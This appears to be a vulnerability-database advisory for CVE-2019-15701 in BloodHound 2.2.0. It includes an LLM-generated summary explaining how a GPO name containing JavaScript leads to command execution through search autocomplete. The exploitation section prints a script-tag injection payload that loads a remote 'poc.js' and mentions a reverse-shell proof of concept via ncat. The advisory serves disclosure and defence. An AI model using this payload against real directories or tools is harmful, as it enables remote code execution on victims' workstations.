CVE-2019-15701
Description
components/Modals/HelpModal.jsx in BloodHound 2.2.0 allows remote attackers to execute arbitrary OS commands (by spawning a child process as the current user on the victim's machine) when the search function's autocomplete feature is used. The victim must import data from an Active Directory with a GPO containing JavaScript in its name.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
BloodHound 2.2.0 allows remote OS command execution via a crafted GPO name with JavaScript in the search autocomplete feature.
Vulnerability
In BloodHound 2.2.0, the components/Modals/HelpModal.jsx component contains a vulnerability in the search function's autocomplete feature. An attacker can create an Active Directory Group Policy Object (GPO) with a name containing malicious JavaScript code. When a user imports data from such an Active Directory (e.g., via SharpHound) and subsequently uses the search autocomplete feature in BloodHound (e.g., searching for a matching string), the injected JavaScript executes. The user must have imported data from an AD that contains a GPO with a crafted name [1].
Exploitation
An attacker who can create or modify a GPO in an Active Directory environment (i.e., has write access to a GPO) can set the GPO name to a string such as aaaaaa<SCRIPT SRC="http://:/poc.js">. The victim then runs SharpHound to collect AD data (e.g., Invoke-BloodHound -Stealth) and imports the resulting JSON into BloodHound. When the victim types a search query that matches part of the GPO name (e.g., "aa"), the autocomplete feature renders the GPO name, causing the external script to load and execute. The script runs in the context of the Desktop application (Electron/Node.js), allowing spawning of child processes. The provided proof-of-concept demonstrates a reverse shell via ncat [1].
Impact
Successful exploitation allows an attacker to execute arbitrary OS commands on the victim's machine, with the privileges of the current user running BloodHound. This can lead to full compromise of the workstaion, including lateral movement possibilities if the user has elevated domain permissions. The impact is high, as it bypasses typical web security boundaries and achieves remote code execution in a desktop application [1].
Mitigation
No official patch or fixed version has been released by the BloodHound team as of the publication date (August 27, 2019). The vendor acknowledged the issue (GitHub issue #267) but no fix was provided in the available references. Users should avoid importing data from untrusted Active Directory sources and consider manually inspecting GPO names for unusual JavaScript until a patch is available [1].
AI Insight generated on May 26, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
2- BloodHound/BloodHounddescription
- Range: =2.2.0
Patches
0No patches discovered yet.
Vulnerability mechanics
AI mechanics synthesis has not run for this CVE yet.
References
1- github.com/BloodHoundAD/BloodHound/issues/267mitrex_refsource_MISC
News mentions
0No linked articles in our index yet.